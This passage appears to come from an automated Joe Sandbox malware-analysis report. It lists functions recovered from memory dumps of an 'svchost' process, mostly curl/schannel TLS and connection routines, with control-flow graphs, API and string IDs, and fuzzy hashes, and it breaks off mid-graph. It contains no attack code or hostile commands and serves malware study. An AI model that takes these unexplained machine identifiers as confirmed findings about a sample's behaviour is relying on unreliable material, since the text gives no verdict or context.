                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: Certmalloc$CertificateContextFreefreememmove$ErrorLastNameString_errnomemsetrealloc
                                                                • String ID: SSL: failed retrieving public key from server certificate$SSL: public key does not match pinned public key$schannel: %s$schannel: Failed to read remote certificate context: %s$schannel: SNI or certificate check failed: %s$schannel: failed to receive handshake, SSL/TLS connection failed$schannel: failed to send next handshake data: sent %zd of %lu bytes$schannel: next InitializeSecurityContext failed: %s$schannel: unable to allocate memory$schannel: unable to re-allocate memory
                                                                • API String ID: 726578228-413892695
                                                                • Opcode ID: dceadbc88c61df8f0e941d432596c493b93759fc88e510aa60893e4e021862c5
                                                                • Instruction ID: cc4c119459f9bc1b9be6bc5dd0b201e4446ce92e1943897df5db3090ec1ac940
                                                                • Opcode Fuzzy Hash: dceadbc88c61df8f0e941d432596c493b93759fc88e510aa60893e4e021862c5
                                                                • Instruction Fuzzy Hash: 13027D7A20978086EB72DFA5E4443EAA7B0F746FC4FC44015EA6E47B94EB78C645E700
                                                                Function 00000173D019E4C0 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 118COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 744 173d019e4c0-173d019e4fe GetLastError _errno 745 173d019e500-173d019e502 744->745 746 173d019e507-173d019e518 744->746 747 173d019ea2e-173d019ea4c call 173d01b9e10 745->747 748 173d019e51e 746->748 749 173d019e8bc-173d019e8c2 746->749 750 173d019e8b0-173d019e8b7 748->750 751 173d019e524-173d019e52d 748->751 753 173d019e936-173d019e93f 749->753 754 173d019e8c4 749->754 761 173d019e54f-173d019e55c call 173d019f5b0 750->761 757 173d019e9be-173d019e9cb 751->757 758 173d019e533-173d019e543 751->758 753->757 760 173d019e941-173d019e959 753->760 755 173d019e8c6-173d019e8cc 754->755 756 173d019e92a-173d019e931 754->756 762 173d019e91e-173d019e925 755->762 763 173d019e8ce-173d019e8d4 755->763 756->761 757->761 765 173d019e9d1-173d019e9e9 call 173d0184eb0 757->765 758->761 760->757 769 173d019e561-173d019e56d 761->769 762->761 767 173d019e912-173d019e919 763->767 768 173d019e8d6-173d019e8dc 763->768 775 173d019e9fb-173d019ea0c _errno 765->775 767->761 771 173d019e8de-173d019e8e4 768->771 772 173d019e906-173d019e90d 768->772 773 173d019e9eb-173d019e9f6 call 173d0184eb0 769->773 774 173d019e573-173d019e58d call 173d0184eb0 769->774 777 173d019e8e6-173d019e8e8 771->777 778 173d019e8fa-173d019e901 771->778 772->761 773->775 774->775 780 173d019ea0e-173d019ea14 _errno 775->780 781 173d019ea17-173d019ea20 GetLastError 775->781 777->757 782 173d019e8ee-173d019e8f5 777->782 778->761 780->781 784 173d019ea2b 781->784 785 173d019ea22-173d019ea25 SetLastError 781->785 782->761 784->747 785->784
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X)$%s (0x%08X) - %s$CRYPT_E_NOT_IN_REVOCATION_DATABASE$CRYPT_E_NO_REVOCATION_CHECK$CRYPT_E_NO_REVOCATION_DLL$CRYPT_E_REVOCATION_OFFLINE$CRYPT_E_REVOKED$No error$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$SEC_I_CONTINUE_NEEDED$Unknown error
                                                                • API String ID: 3939687465-2168394622
                                                                • Opcode ID: e510bd89133b98551c2ded33f339925ccf4eb4118a24304ddea983bd7d095df7
                                                                • Instruction ID: 544b64602be8c933e62e23b458180b0e8d622f84f7117130510cf42fe0692c4c
                                                                • Opcode Fuzzy Hash: e510bd89133b98551c2ded33f339925ccf4eb4118a24304ddea983bd7d095df7
                                                                • Instruction Fuzzy Hash: 3A5156BD21C64496FA759B85F8843E9E2B1B348FC8FC85015E9BE02691FB38C745F210
                                                                Function 00000173D0152A50 Relevance: 28.7, APIs: 19, Instructions: 169COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 786 173d0152a50-173d0152a9b calloc 787 173d0152bf4-173d0152bfd _errno 786->787 788 173d0152aa1-173d0152b20 malloc 786->788 789 173d0152bff-173d0152c1b 787->789 790 173d0152b63-173d0152b6b 788->790 791 173d0152b22-173d0152b4d InitializeCriticalSectionEx call 173d019b3f0 788->791 793 173d0152b7b-173d0152b82 790->793 794 173d0152b6d-173d0152b73 closesocket 790->794 800 173d0152b53-173d0152b5b 791->800 801 173d0152c1c-173d0152c30 _strdup 791->801 795 173d0152b94-173d0152ba5 free 793->795 796 173d0152b84-173d0152b8e DeleteCriticalSection free 793->796 794->793 798 173d0152ba7 call 173d01616c0 795->798 799 173d0152bac-173d0152bb4 795->799 796->795 798->799 803 173d0152bb6 closesocket 799->803 804 173d0152bbc-173d0152bee free 799->804 800->790 801->790 805 173d0152c36-173d0152c56 free _strdup 801->805 803->804 804->787 806 173d0152c58-173d0152c67 call 173d01648e0 805->806 807 173d0152c84-173d0152c8e 805->807 813 173d0152c6c-173d0152c72 806->813 808 173d0152c90-173d0152cb8 EnterCriticalSection LeaveCriticalSection 807->808 809 173d0152d02-173d0152d1d free 807->809 811 173d0152cba-173d0152cc2 call 173d0164920 808->811 812 173d0152ccb-173d0152cce 808->812 809->787 822 173d0152cee-173d0152cfc call 173d01878b0 closesocket 811->822 815 173d0152cd8-173d0152ce8 call 173d01528c0 free 812->815 816 173d0152cd0-173d0152cd3 call 173d0164930 812->816 817 173d0152cc4-173d0152cc6 813->817 818 173d0152c74-173d0152c81 _errno 813->818 815->822 816->815 817->789 818->807 822->809
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$CriticalSection$closesocket$_errno_strdup$DeleteEnterInitializeLeavecallocmallocsocket
                                                                • String ID:
                                                                • API String ID: 941918121-0
                                                                • Opcode ID: f7b7d5e47d6d708bd0e22812e4ed0cd66e6031231705c6cb0dfdc9715a5c2e24
                                                                • Instruction ID: f8a1249b4c89a1836737d4a80280e31f7e3b694c0c6d8798c8eda25d5f4f1c3c
                                                                • Opcode Fuzzy Hash: f7b7d5e47d6d708bd0e22812e4ed0cd66e6031231705c6cb0dfdc9715a5c2e24
                                                                • Instruction Fuzzy Hash: C8814C3A505B8086E634DBA1E8543AEB370F799BA4F445315DBBE077A1EF78E294D300
                                                                Function 00000173D01B15D0 Relevance: 28.3, APIs: 5, Strings: 11, Instructions: 280libraryloaderCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 940 173d01b15d0-173d01b164d call 173d01b4a40 call 173d01b4a20 call 173d01ac700 947 173d01b165e-173d01b1662 940->947 948 173d01b164f-173d01b1659 call 173d0164b60 940->948 950 173d01b16ae 947->950 951 173d01b1664-173d01b1684 GetModuleHandleW GetProcAddress 947->951 948->947 953 173d01b16b0-173d01b16b7 950->953 951->950 952 173d01b1686-173d01b16a8 call 173d01ac700 951->952 952->950 960 173d01b16aa-173d01b16ac 952->960 955 173d01b16c3-173d01b16e5 call 173d01ac700 953->955 956 173d01b16b9-173d01b16bd 953->956 963 173d01b1a1c-173d01b1a2b call 173d0164a70 955->963 964 173d01b16eb 955->964 956->955 958 173d01b16bf-173d01b16c1 956->958 961 173d01b16ed-173d01b16f8 958->961 960->953 965 173d01b1734-173d01b173a call 173d01b0380 961->965 966 173d01b16fa-173d01b171b call 173d01b5af0 call 173d01b53d0 961->966 974 173d01b1a30-173d01b1a59 call 173d01b9e10 963->974 964->961 971 173d01b173f-173d01b1745 965->971 980 173d01b171d-173d01b1724 966->980 981 173d01b1727-173d01b1732 call 173d01b5b20 966->981 971->974 975 173d01b174b-173d01b1752 971->975 978 173d01b1754 975->978 979 173d01b1757-173d01b176a call 173d01626d0 975->979 978->979 987 173d01b1770-173d01b1774 979->987 988 173d01b18b9-173d01b18be 979->988 980->981 981->965 981->987 989 173d01b1776-173d01b1780 call 173d0164b60 987->989 990 173d01b1785-173d01b1789 987->990 988->974 989->990 992 173d01b183b-173d01b1852 990->992 993 173d01b178f-173d01b17a9 call 173d01b4040 990->993 994 173d01b1859-173d01b1885 992->994 1001 173d01b17ab-173d01b17bf call 173d0164a70 993->1001 1002 173d01b17c4-173d01b1839 memmove call 173d01ac980 call 173d01b4100 call 173d0164b60 993->1002 996 173d01b188e-173d01b18a8 calloc 994->996 997 173d01b1887 994->997 999 173d01b18c3-173d01b1915 996->999 1000 173d01b18aa-173d01b18b4 call 173d0164a70 996->1000 997->996 1007 173d01b191d-173d01b1924 999->1007 1000->988 1001->974 1002->994 1009 173d01b199d-173d01b19df call 173d0158c60 1007->1009 1010 173d01b1926-173d01b1951 free call 173d019e4c0 1007->1010 1027 173d01b19e1-173d01b19e4 1009->1027 1028 173d01b1a03-173d01b1a1a call 173d0164a70 1009->1028 1018 173d01b1953-173d01b1959 1010->1018 1019 173d01b1987-173d01b1998 call 173d0164a70 1010->1019 1023 173d01b195b-173d01b196c call 173d0164a70 1018->1023 1024 173d01b1971-173d01b1982 call 173d0164a70 1018->1024 1019->974 1023->974 1024->974 1027->1028 1031 173d01b19e6-173d01b1a01 1027->1031 1028->974 1031->974
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ConditionMask$AddressHandleInfoModuleProcVerifyVersionmemmove$ErrorLast_errnocallocfreememset
                                                                • String ID: ALPN: curl offers %s$Error setting ALPN$ntdll$schannel: SNI or certificate check failed: %s$schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc.$schannel: failed to send initial handshake data: sent %zd of %lu bytes$schannel: initial InitializeSecurityContext failed: %s$schannel: this version of Windows is too old to support certificate verification via CA bundle file.$schannel: unable to allocate memory$schannel: using IP address, SNI is not supported by OS.$wine_get_version
                                                                • API String ID: 3185706071-3097429119
                                                                • Opcode ID: 8a031a964fd8ab912a4284cec04f5126e57061bfdf8df424aa37bbdfd8a01d6c
                                                                • Instruction ID: 1c8ab6b178335d59701e3f05246e5a8f64825e96a79ae3e325994a41e5a194e2
                                                                • Opcode Fuzzy Hash: 8a031a964fd8ab912a4284cec04f5126e57061bfdf8df424aa37bbdfd8a01d6c
                                                                • Instruction Fuzzy Hash: 5CD1593A608B408AFB219FA5E8403DEB7B4F746BC8F804015DA5E17B95EB78C655E740
                                                                Function 00000173D01A8E00 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 137stringCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1082 173d01a8e00-173d01a8e3d call 173d015cfb0 1085 173d01a8f9d-173d01a8fc2 calloc 1082->1085 1086 173d01a8e43-173d01a8e4a 1082->1086 1087 173d01a8fcb-173d01a8fe9 call 173d0161b60 1085->1087 1088 173d01a8fc4-173d01a8fc9 1085->1088 1089 173d01a8e4c-173d01a8e56 1086->1089 1090 173d01a8ea6-173d01a8ec1 1086->1090 1102 173d01a8feb-173d01a8ff2 1087->1102 1103 173d01a9026-173d01a902e 1087->1103 1095 173d01a9034-173d01a904c 1088->1095 1091 173d01a8e80-173d01a8e87 1089->1091 1092 173d01a8e58-173d01a8e6d strncmp 1089->1092 1093 173d01a8ecb 1090->1093 1094 173d01a8ec3-173d01a8ec9 1090->1094 1091->1090 1098 173d01a8e89-173d01a8ea4 1091->1098 1092->1091 1097 173d01a8e6f-173d01a8e7a 1092->1097 1099 173d01a8ed1 1093->1099 1094->1099 1097->1085 1097->1091 1101 173d01a8ed7-173d01a8eed _strdup 1098->1101 1099->1101 1101->1088 1105 173d01a8ef3-173d01a8f09 call 173d0174fc0 1101->1105 1106 173d01a9006-173d01a9024 free 1102->1106 1107 173d01a8ff4-173d01a9001 call 173d0164a70 1102->1107 1104 173d01a9032 1103->1104 1104->1095 1110 173d01a8f0e-173d01a8f11 1105->1110 1106->1095 1107->1106 1111 173d01a8f1b-173d01a8f1e 1110->1111 1112 173d01a8f13-173d01a8f16 1110->1112 1113 173d01a8f72-173d01a8f77 1111->1113 1114 173d01a8f20-173d01a8f6d call 173d01a3b60 call 173d01a3bf0 call 173d0164a70 1111->1114 1112->1104 1113->1104 1115 173d01a8f7d-173d01a8f98 call 173d0164a70 1113->1115 1114->1095 1115->1095
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: _strdupcallocfreestrncmp
                                                                • String ID: Could not resolve %s: %s$Failed to resolve %s '%s' with timeout after %lld ms$Unix socket path too long: '%s'$anonymous$host$localhost/$proxy
                                                                • API String ID: 2270677362-4063513385
                                                                • Opcode ID: 07ecf09e9642a1d10960b7bf778c044a930d759cebb79cc3b74f6d8eac5074ee
                                                                • Instruction ID: 4e2ac8d9b3097b46ddd416f456de6acb53454c8f53b0a49a085e5ea55fba6273
                                                                • Opcode Fuzzy Hash: 07ecf09e9642a1d10960b7bf778c044a930d759cebb79cc3b74f6d8eac5074ee
                                                                • Instruction Fuzzy Hash: 5A51A23920DA8086FB758BA5D4003E9A771F741FC8F884025EE6D5B795FB39CA86E740
                                                                Function 00000173D015D570 Relevance: 18.0, APIs: 1, Strings: 9, Instructions: 487COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1124 173d015d570-173d015d5c8 1125 173d015d5d0-173d015d5f7 call 173d01a3b60 1124->1125 1128 173d015d600-173d015d606 1125->1128 1129 173d015d851-173d015d868 1128->1129 1130 173d015d60c-173d015d610 1128->1130 1129->1128 1131 173d015d86e 1129->1131 1130->1129 1132 173d015d616-173d015d61a 1130->1132 1135 173d015d872-173d015d875 1131->1135 1133 173d015d626-173d015d631 1132->1133 1134 173d015d61c-173d015d621 1132->1134 1136 173d015d633-173d015d635 1133->1136 1137 173d015d6ab-173d015d6d6 call 173d0164bb0 1133->1137 1134->1129 1138 173d015dcf2 1135->1138 1139 173d015d87b-173d015d882 1135->1139 1136->1137 1141 173d015d637-173d015d644 call 173d0158860 1136->1141 1152 173d015d6f8-173d015d6fc 1137->1152 1153 173d015d6d8-173d015d6db 1137->1153 1142 173d015dcf6 1138->1142 1143 173d015d884-173d015d887 1139->1143 1144 173d015d88d-173d015d897 1139->1144 1154 173d015d649-173d015d64e 1141->1154 1147 173d015dcf8-173d015dd1a 1142->1147 1143->1144 1148 173d015dbb1-173d015dbc3 call 173d0164bb0 1143->1148 1149 173d015d899-173d015d8c6 call 173d01a3bf0 1144->1149 1150 173d015d8ca-173d015d908 call 173d01a3bf0 1144->1150 1173 173d015dbc7-173d015dbcd 1148->1173 1149->1150 1166 173d015d90a-173d015d911 1150->1166 1167 173d015d914-173d015d917 1150->1167 1162 173d015d702-173d015d707 1152->1162 1163 173d015d84e 1152->1163 1158 173d015da31-173d015da48 1153->1158 1159 173d015d6e1-173d015d6e8 1153->1159 1160 173d015d654-173d015d657 1154->1160 1161 173d015d6ed-173d015d6f0 1154->1161 1158->1135 1159->1163 1169 173d015d659-173d015d65f 1160->1169 1170 173d015d661-173d015d682 call 173d01a3bf0 1160->1170 1161->1137 1168 173d015d6f2-173d015d6f6 1161->1168 1171 173d015d709-173d015d712 WSASetLastError 1162->1171 1172 173d015d718-173d015d722 1162->1172 1163->1129 1166->1167 1174 173d015d91d-173d015d920 1167->1174 1175 173d015dcbc-173d015dcf0 call 173d01a3bf0 call 173d0164a70 1167->1175 1168->1137 1169->1137 1195 173d015d6a7 1170->1195 1196 173d015d684-173d015d6a0 call 173d0164b60 1170->1196 1171->1172 1177 173d015d755-173d015d795 call 173d01a3bf0 1172->1177 1178 173d015d724-173d015d751 call 173d01a3bf0 1172->1178 1179 173d015dbcf-173d015dbf7 call 173d0164bb0 1173->1179 1180 173d015dc00-173d015dc0b 1173->1180 1183 173d015d926-173d015d933 1174->1183 1184 173d015dba0-173d015dba3 1174->1184 1175->1147 1199 173d015d797-173d015d79e 1177->1199 1200 173d015d7a1-173d015d7a5 1177->1200 1178->1177 1179->1180 1201 173d015dbf9-173d015dbfe 1179->1201 1180->1173 1181 173d015dc0d 1180->1181 1190 173d015dc13-173d015dc1f 1181->1190 1192 173d015d939-173d015d93d 1183->1192 1193 173d015da6b-173d015da76 1183->1193 1184->1148 1194 173d015dba5-173d015dbac 1184->1194 1202 173d015dc21-173d015dc28 1190->1202 1203 173d015dc2f-173d015dc37 1190->1203 1192->1193 1205 173d015d943-173d015d94a 1192->1205 1207 173d015db8b-173d015db96 1193->1207 1208 173d015da7c-173d015da80 1193->1208 1194->1142 1195->1137 1196->1195 1199->1200 1210 173d015d7a7-173d015d7ae 1200->1210 1211 173d015d7f4-173d015d802 1200->1211 1201->1180 1212 173d015dc2a-173d015dc2d 1201->1212 1213 173d015dc59-173d015dcba call 173d019ee20 call 173d01a3bf0 call 173d0164a70 1202->1213 1216 173d015dc39-173d015dc40 1203->1216 1217 173d015dc42-173d015dc4a 1203->1217 1218 173d015d952-173d015d974 call 173d01a3bf0 1205->1218 1219 173d015d94c-173d015d950 1205->1219 1207->1125 1215 173d015db9c 1207->1215 1208->1207 1209 173d015da86-173d015da8d 1208->1209 1221 173d015da95-173d015dab3 call 173d01a3bf0 1209->1221 1222 173d015da8f-173d015da93 1209->1222 1223 173d015d7c7-173d015d7cf 1210->1223 1224 173d015d7b0-173d015d7b7 1210->1224 1229 173d015d806-173d015d813 1211->1229 1212->1190 1213->1147 1215->1184 1216->1213 1226 173d015dc55 1217->1226 1227 173d015dc4c-173d015dc53 1217->1227 1218->1193 1225 173d015d97a-173d015d984 1218->1225 1219->1218 1219->1225 1221->1207 1231 173d015dab9-173d015dac3 1221->1231 1222->1221 1222->1231 1234 173d015d7e1-173d015d7f2 call 173d015d0d0 1223->1234 1235 173d015d7d1-173d015d7dd 1223->1235 1224->1223 1233 173d015d7b9-173d015d7bf 1224->1233 1237 173d015d9b7-173d015d9f7 call 173d01a3bf0 1225->1237 1238 173d015d986-173d015d9b3 call 173d01a3bf0 1225->1238 1226->1213 1227->1213 1239 173d015d815-173d015d821 call 173d0164bb0 1229->1239 1240 173d015d823-173d015d841 call 173d0164bb0 call 173d01874f0 1229->1240 1246 173d015dac5-173d015daf2 call 173d01a3bf0 1231->1246 1247 173d015daf6-173d015db36 call 173d01a3bf0 1231->1247 1233->1224 1245 173d015d7c1-173d015d7c5 1233->1245 1234->1229 1235->1234 1262 173d015d9f9-173d015da00 1237->1262 1263 173d015da03-173d015da21 call 173d015d0d0 1237->1263 1238->1237 1260 173d015d846-173d015d84a 1239->1260 1240->1260 1245->1234 1246->1247 1269 173d015db38-173d015db3f 1247->1269 1270 173d015db42-173d015db60 call 173d015d0d0 1247->1270 1260->1163 1262->1263 1273 173d015da23-173d015da2f call 173d0164bb0 1263->1273 1274 173d015da4d-173d015da65 call 173d0164bb0 1263->1274 1269->1270 1276 173d015db62-173d015db6e call 173d0164bb0 1270->1276 1277 173d015db70-173d015db88 call 173d0164bb0 1270->1277 1273->1193 1274->1193 1276->1207 1277->1207
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: CounterPerformanceQuery
                                                                • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed
                                                                • API String ID: 2783962273-3359130258
                                                                • Opcode ID: 0c326179b19429aad917b0afc1b3ccf9519d9a8f9c5be530e1f2f89f467c6228
                                                                • Instruction ID: 22de290a7b06b0d043c285845593329825030357a2ea3c9f1941a83cc82ae4f7
                                                                • Opcode Fuzzy Hash: 0c326179b19429aad917b0afc1b3ccf9519d9a8f9c5be530e1f2f89f467c6228
                                                                • Instruction Fuzzy Hash: AD328C36B08AC08AFB218FE5D5453ECA3B1B745F98F844215DE6D2BB99EB30C652D340
                                                                Function 00000173CFC16194 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 62COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 00000173CFC3A1A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00000173CFC06283), ref: 00000173CFC3A1C0
                                                                  • Part of subcall function 00000173CFC3A1A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00000173CFC06283), ref: 00000173CFC3A1C8
                                                                  • Part of subcall function 00000173CFC3A1A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00000173CFC06283), ref: 00000173CFC3A1D1
                                                                  • Part of subcall function 00000173CFC3A1A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00000173CFC06283), ref: 00000173CFC3A1ED
                                                                • _Getdays.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000173CFC19F7E), ref: 00000173CFC161D9
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000173CFC19F7E), ref: 00000173CFC161F6
                                                                • _Maklocstr.LIBCPMT ref: 00000173CFC16212
                                                                • _Getmonths.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000173CFC19F7E), ref: 00000173CFC1621B
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000173CFC19F7E), ref: 00000173CFC16238
                                                                • _Maklocstr.LIBCPMT ref: 00000173CFC16254
                                                                • _Maklocstr.LIBCPMT ref: 00000173CFC16269
                                                                  • Part of subcall function 00000173CFC04F40: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000173CFC11F54,?,?,?,00000173CFC0464B,?,?,?,00000173CFC05D21), ref: 00000173CFC04F62
                                                                  • Part of subcall function 00000173CFC04F40: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000173CFC11F54,?,?,?,00000173CFC0464B,?,?,?,00000173CFC05D21), ref: 00000173CFC04F88
                                                                  • Part of subcall function 00000173CFC04F40: memmove.VCRUNTIME140(?,?,?,00000173CFC11F54,?,?,?,00000173CFC0464B,?,?,?,00000173CFC05D21), ref: 00000173CFC04FA0
                                                                Strings
                                                                • :AM:am:PM:pm, xrefs: 00000173CFC16262
                                                                • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00000173CFC16201
                                                                • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00000173CFC16243
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2555978653.00000173CFC01000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173CFC00000, based on PE: true
                                                                • Associated: 00000010.00000002.2555926187.00000173CFC00000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556090829.00000173CFC55000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556158270.00000173CFC86000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8A000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8F000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173cfc00000_svchost.jbxd
                                                                Similarity
                                                                • API ID: Maklocstrfree$GetdaysGetmonths___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funcmallocmemmove
                                                                • String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                • API String ID: 269533641-35662545
                                                                • Opcode ID: fab2c605505c6a7b288d1ea27734c5cb1f34f6dc1052efb48d64a64469115f62
                                                                • Instruction ID: efefaa54e3f65aa8f2e707a17c1e2199d07d4b985e8462ad5b00c21dca553648
                                                                • Opcode Fuzzy Hash: fab2c605505c6a7b288d1ea27734c5cb1f34f6dc1052efb48d64a64469115f62
                                                                • Instruction Fuzzy Hash: 5F215A37704B4182E701EF21E4403A973B1E799F88F44C922DA9D6375ADF38D695E380
                                                                Function 00000173D0155EA0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154networkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1303 173d0155ea0-173d0155ed8 1304 173d0156126 1303->1304 1305 173d0155ede-173d0155ee1 1303->1305 1306 173d015612a 1304->1306 1307 173d0155ee3-173d0155ee8 1305->1307 1308 173d0155eed-173d0155ef9 1305->1308 1309 173d015612c-173d015614b call 173d01b9e10 1306->1309 1307->1309 1310 173d0155eff-173d0155f08 call 173d01579f0 1308->1310 1311 173d0156062-173d015607f call 173d0192690 1308->1311 1320 173d0155fb3-173d0155fba 1310->1320 1321 173d0155f0e-173d0155f11 1310->1321 1318 173d0156098-173d015609b 1311->1318 1319 173d0156081-173d0156093 call 173d0164bb0 1311->1319 1325 173d01560d0-173d01560de call 173d01582d0 1318->1325 1326 173d015609d-173d01560a8 1318->1326 1319->1306 1323 173d0155fbc-173d0156028 call 173d0157f90 WSASetLastError call 173d019ec40 call 173d0164b60 1320->1323 1324 173d015602d-173d0156038 1320->1324 1321->1304 1327 173d0155f17-173d0155f34 1321->1327 1323->1324 1333 173d0156057 1324->1333 1334 173d015603a-173d015604c call 173d0158110 1324->1334 1341 173d01560e3-173d01560e5 1325->1341 1326->1325 1330 173d01560aa-173d01560ad 1326->1330 1331 173d0155f36-173d0155f4b connect 